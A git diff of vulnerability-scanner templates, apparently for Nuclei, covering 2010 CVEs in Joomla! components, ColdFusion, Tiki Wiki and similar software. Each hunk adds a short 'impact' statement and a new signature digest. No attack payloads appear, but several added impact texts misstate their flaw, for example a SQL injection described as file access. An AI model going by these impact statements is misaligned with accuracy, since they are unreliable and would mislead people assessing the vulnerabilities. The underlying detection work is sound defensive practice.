-# digest: 4b0a00483046022100e9b6d4cb087351f9bbfa5d26235e4a21cfff11d665337847ba26e846db810d6f022100e8c7811588708a14f05413dbe75fd5b89903259791d53c44b4441c912ed1db35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c0dc47212898eb091df74236685b77998209ca78058c2dc670b09c01c9e4237a022054b30b0fda49971bf03c7fa66d263d93ce1612b83cd30200ca9fb66935f58441:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml
index 1a26fcd907..5905cb0977 100644
--- a/http/cves/2010/CVE-2010-2045.yaml
+++ b/http/cves/2010/CVE-2010-2045.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12595
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207373f7cb791f81eddbf0a1b8b668d512e0ed216817535ece1614c068dd0887bf02202503c2af2bfb408fad21ea17a0095eb751baa132159150a27fdeb7ae01d9c83d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202204d189f12836aab573b907af0c77342ed476c85174a34b4d425e0907216d50022070202d7e8c7655fa80ed2098d9461ff3ae92107234d4877f0cf675eaa5f5d2b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml
index 92afc9fe75..8f2d7df959 100644
--- a/http/cves/2010/CVE-2010-2050.yaml
+++ b/http/cves/2010/CVE-2010-2050.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12611
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220601cb95f34571c666483781468e0ca54cc0dc4d3bf666a38e9c1335bc0b79f29022100c1d129fef04cd524fd16386596124cae16fae430893a6e39de2c000a1ed47224:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220539e9d6bb4b7d50a7f9a7b667d71f867c1269d30d845e61f29b8e88370f80d1e022100ac97c13da8a1971722dd205468217eaba67767118bd97cf63e9c933f099c8715:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml
index 6a1ba0df78..833fba3283 100644
--- a/http/cves/2010/CVE-2010-2122.yaml
+++ b/http/cves/2010/CVE-2010-2122.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    An attacker can retrieve arbitrary files from the server, potentially leading to unauthorized access or sensitive data exposure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12623
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204fb78de3af1c8012601e7112a972de40e6aa647c2bc10efaf6ceed29c14e5d1d022100a1733aace7f15c711f66ca7bbccc90bae9735a59482ec01f4d736807e8b55394:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100df58fff1f3c41f0bb2e7cffc588de1539e3e3836befa9de4e1f06a5d9f04c2b802210083af992f09518510d80aa9a38b8c07453e81628f93cbc5b0fd36fc2e1a883bae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml
index 038e4f83ff..68a18af5de 100644
--- a/http/cves/2010/CVE-2010-2128.yaml
+++ b/http/cves/2010/CVE-2010-2128.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12607
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e1f15dbfd8fe39c94929c260722ba127e377764fe39a59d6c987f9ce54da4efb022100ef0493a54e236ea7edbb462b01d85272f079cdced35009ea0efb61e04168202c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c37d961964fbcd929dedc795e0f58c194527654157a2f86ca940108ed06c346a02203292c5ccaacb2231fa3525be77ab8b74a27cba4f28c35e587fdbac39b44c4da2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml
index c6d126d29b..e5efbbbe3f 100644
--- a/http/cves/2010/CVE-2010-2259.yaml
+++ b/http/cves/2010/CVE-2010-2259.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/10946
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ac1505d814f9f4c9c9d46b86b9a41ab8ed267eee4c77dc8c99e055b2787f72b9022100d705ba7908b9e6c9a58251c109477545cd2fec28922b29fe23d940f5f2308603:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220731b630d781a49cbe5204a65cc925bf89702091e3a9e7aa70850fde793905752022100deb1699185259f6c8fe823f320455fdfcb2e7bb021f5809ad5e3e85ce3c54510:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml
index 6a549c25f2..636f1db8e8 100644
--- a/http/cves/2010/CVE-2010-2307.yaml
+++ b/http/cves/2010/CVE-2010-2307.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
+  impact: |
+    An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
   remediation: Upgrade to a supported product version.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2010-2307
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ecda0d3507d14cfd1876d3d51d9d8e3219209e2e63c77e6f792912aa8360314d022100f5e2d29c5f2c9a8bc86893d04c365169012651f4f6a0f18b0e5c050ccaed4ddc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d40ba8b9b481ae166888c551f72da68db055a11093fb78111e3b2c6b1d0b8d900221009e3b4258da5e1f03ffd3b1e4bdf63f4eb9985b20af64a31b8e0769ed840960ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml
index 128ebe3b9e..155ed6a142 100644
--- a/http/cves/2010/CVE-2010-2507.yaml
+++ b/http/cves/2010/CVE-2010-2507.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/13981
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022039f6110cabc617afd3e96b2fc42b914b3c9ad6e15797a38c066f2b7230ec9b92022100d6ed6291d2c1aa3ea282916d08d23459c4abdb22f7a2a23e5996b08311df80fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100eec0a10467257dc4fe9e5b4bb4eaddfcea252a543161ea0d283d5a72bac72120022001467f6d2b1303150b144f8e62a51b12e036c7e89d9d225514b357f39c403000:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml
index 615f4ca0ad..fdc42c72a3 100644
--- a/http/cves/2010/CVE-2010-2682.yaml
+++ b/http/cves/2010/CVE-2010-2682.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! website.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/14017
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bcd66f91f8905f8ee9afb4cc9c3b87bbbb97c29a7304afb8b1732dfd63db494f0221008d95c6d23d088a8391654b722965c64308378f94bd199e551781f7786fd678a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022077113634884da4ef865ca94b2ee7df0fee6a54b02d65864d8d0914f3b6addbf002203a926595b9b2d25ef287c355308f11792796d904556fe01207c800a15d99645a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml
index 28b6bfab03..f5d389cf57 100644
--- a/http/cves/2010/CVE-2010-2857.yaml
+++ b/http/cves/2010/CVE-2010-2857.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/14274
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a20dd9cc0bf9b879e7a93a855852d5e1ff0c4495105c1cb3386ccd491ae07574022100870d2b4947a1bdf4bc7acfe78be79aa68ad56fb7881ca6d0095860d69b56a6c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d5dd079a5e74c0a667d179123e54dcd75cb9f630efc5a27b28d4c19fa90806a3022100cef8eb3f80950d53aff9eac487482525a1cd731182acca02eee4b5b6087c23b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml
index e0ec0fb834..9c8c59e8dc 100644
--- a/http/cves/2010/CVE-2010-2861.yaml
+++ b/http/cves/2010/CVE-2010-2861.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information and potential compromise of the affected system.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100eea23236dfb2c8260879245cb52248481874bf8ea9a3218eaecdfc2f59fcd9b902204f286b1a52b1656aa66630f1bbe719f784974223f834fdf756b1613ca130d313:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008fdd973723abb3ec0f3e399df369a16f587425edad3a51994b1888d60ed65bd9022022ac61a31821cc6a16fd4b12a5f8e402090c01bfc530b8662c11381d13c862c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml
index 8248ee9f4b..37c55cc45b 100644
--- a/http/cves/2010/CVE-2010-2918.yaml
+++ b/http/cves/2010/CVE-2010-2918.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
+  impact: |
+    Remote file inclusion vulnerability in Joomla! Component Visites 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/31708
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210096377401fd96f22359d82625f1928df2de7ae04492895cc1c477714ceebc56c8022010f6c8dc2c9bdfe56eb19aeff95eb8ff7f5a02eb7ebdeba6981b5af5b5268a69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ed26b0bbeaaba277168e22d6c019818acb8019c5313cd05227b14a379490d391022100b173aea58b5b7b7343ec98009ef6d65eeb69e8de3364a5957050537d3b2673e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml
index 77e359433d..1f104bcb7c 100644
--- a/http/cves/2010/CVE-2010-3203.yaml
+++ b/http/cves/2010/CVE-2010-3203.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/14845
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206015ea2e49a49da3dae0795f8d72ca47ad97d00c810edb8909f86f8367a3dffb022100e1168138398e311b8e90dcdd953854629d94603f777c0b3fe29c59ed0e1ebf81:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022055282e097cada824716a1132835910ae549eda512b08b7d249ca747743d2699a022100aded409dcfe3fd85214075406aa8b20d6de14eebcb958fdd9966de08a109fc38:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml
index 0cac866348..123ebd7f49 100644
--- a/http/cves/2010/CVE-2010-3426.yaml
+++ b/http/cves/2010/CVE-2010-3426.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/14964
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022071b2e39d247368321fe26a870c1863dfc4a967361f5f67cb9e693ed5ca5c7b690220735e83f2c4359bbe56779d43b01a77a8d5b9813d55bbcb17cd911478bef808ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201b095b1d1d4407f08447f760c1185c842baaf9bc39358cd1a6d9c6d5c5456f0f022001934471878708a173e28ab337ae303cd8e64fb9c3e3e59df52cadc20fb6b58c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml
index 8c80b27a70..540972ae41 100644
--- a/http/cves/2010/CVE-2010-4231.yaml
+++ b/http/cves/2010/CVE-2010-4231.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive files and directories on the camera.
   remediation: Upgrade to a supported product version.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2010-4231
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502202652fc98e97327ea39af4374a1bd7fdc2283c67b89c4088a8004384d181166ad022100de4f26d7e5d3d03e25674d1416d86859dda95aab12e47928de4fee82dd63f332:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206f95311eb9d11414e153cc82bf81e5ae3c46cbd6531189658fb6d14fc3fb82ae02210091aef93930a52079339893e4a31eb22528474821ec81b1cf2d97e8344fea0ff6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml
index a33598d2e7..fafad30e1c 100644
--- a/http/cves/2010/CVE-2010-4239.yaml
+++ b/http/cves/2010/CVE-2010-4239.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_akoko
   severity: critical
   description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
   remediation: |
     Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 4b0a00483046022100e32971dcd8a98425c8debf614fcd5d835d07bac4b62b0a569104508aac1c9d02022100cc91e91ad102119063c909d5590726ea69cec3947ce1b2f48416b00cecfc3b5a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210090c56e842aeb3570e427312f5aee63103c4b7521f430ae37bdf3307a3d3147c8022065ff372bacb5bda3d4f03c53a39317a8bb9fe0aaa14e20f4eebfd32acf972065:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml
index 81a2697d9d..aba32eb286 100644
--- a/http/cves/2010/CVE-2010-4282.yaml
+++ b/http/cves/2010/CVE-2010-4282.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive files containing confidential information, such as configuration files or user credentials.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/15643
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204a0689ae7e2b94e685165427ca5a1dbd1b254f8a1293c3189c1011856b84a392022100fd9c36b8cdb35f035b2d4caeef0d789dcc5655ab507ef1c156fc13b7ffc62979:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cbf7398b57938fea537f5a30f8781a9a7094027c0aa7ffb5b94f2e75c71e722c02210090225f538796981048a678a70a32955fa592c09a8d9b86af85f2dca137f4d264:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml
index bf32a4874f..ace71e97db 100644
--- a/http/cves/2010/CVE-2010-4617.yaml
+++ b/http/cves/2010/CVE-2010-4617.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/15791
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220751daf98adf2fc76934784b506a2c313a9dd325da74db77eae0a899a5604ffe4022100b96e21a4ede659a8c6da54c294a86ed5fa7dcf1f33dac72cac2ef36ed15ef7c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201e304c93872774375c9e2f40a3ea3a62a2e718f2373aa7d717296bea538a9d5602204a3b5200b63cb849e7d2f3dd9dfff012c07cdb6472472b0188f5c953fe181dfe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml
index 262ad8f1ba..4dbae68153 100644
--- a/http/cves/2010/CVE-2010-4719.yaml
+++ b/http/cves/2010/CVE-2010-4719.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to further compromise.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/15749
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022056706eff2101e1608f470f1ed1ab9fca43ca055c5e0736b57a12f9da101e52480220217cdd8750c4ba9af1b49959c7315b35401106349adc128cb24d039896392be4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e1f8a372c1bd7932dce981902ac35522c36e7998e6ebca24a9674c9a95dbb83e02206b50e0d0af2f400db04740e43eeb43f9d9ba537f771047dc85207c54326376ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml
index ecc5ddf385..ed3e5618d0 100644
--- a/http/cves/2010/CVE-2010-4769.yaml
+++ b/http/cves/2010/CVE-2010-4769.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/15585
@@ -37,4 +39,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e1a0c3416a934165ab086fd764ec201e91351d2d4e3a11a5744fed0196265ee702203dbdf6d49f76074c9ddaeb09f1952e3c691a4a8b64004d3d5caf5232b4ca3696:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100acb1d49a85e8148634326e4c540adb9cbae3fd6807926467774e19b92ba508a2022100ff8ae67f23946a9a48b56c85d74a003f211d02b379ed1d446234f3fb2f4ca887:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml
index dddc1d3084..4a1c1bd897 100644
--- a/http/cves/2010/CVE-2010-4977.yaml
+++ b/http/cves/2010/CVE-2010-4977.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/34250
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022026b8a76df6727bda4609be663e800e4cf7307d6348437e4c3e640cd3229b3cfe02204695e1e6810dc71e385251a2416a9ccd9f78d09e04b05e3fa277ab29b41278a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200a92230f9eac5cba3cbd4791acec5b8cf3cd4a0762c4b3bb3aaca79e5d4f5e61022100d187141dbf118e5c522c0b10a8e03d9339dfa8c86a02fb2ac445b9be7b74c57f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml
index fdaad34b5b..4060c4e39c 100644
--- a/http/cves/2010/CVE-2010-5028.yaml
+++ b/http/cves/2010/CVE-2010-5028.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12601
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220243c914cc636e6fe2ccaaa26bc1684ac9b0f4c2b7be8d6ba831b4b12e304a5380221008081d8aa6eb727d81a33d509c1ce0e14fcd3d10cc6784f445a42912b2cc6f865:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f9a4d2c0299973501883e58d5c3a97b018103699cb9b3631ec1cdabc4a8adfa602207c1c3c3aa91f435b358f0c3b805b814035f680e56429822d17f4fef3ed0451a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml
index 7ce094a5c5..abf68c25d8 100644
--- a/http/cves/2010/CVE-2010-5278.yaml
+++ b/http/cves/2010/CVE-2010-5278.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: |
     Apply the latest patches and updates provided by MODx to fix the LFI vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100fe9f307e9f81a5335488b4fb4096ac2369154670a82fe8c177b53bcbdb45a1d2022048032106cb02da6d0a955729b170bd5fabf68fe23f3bfc9599e7810e36ca1af1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200f081c8c91e4617e57f2d789627f44bbe9800bf9091202355b24fecf7ae94dd60221009e2b1786ca510e019b852ba7ab30f16dfa4ca4749bf2af388ff29fd8cb580b36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml
index 9707be3693..05e054c6da 100644
--- a/http/cves/2010/CVE-2010-5286.yaml
+++ b/http/cves/2010/CVE-2010-5286.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Arbitrary file inclusion leading to remote code execution
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/34837
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
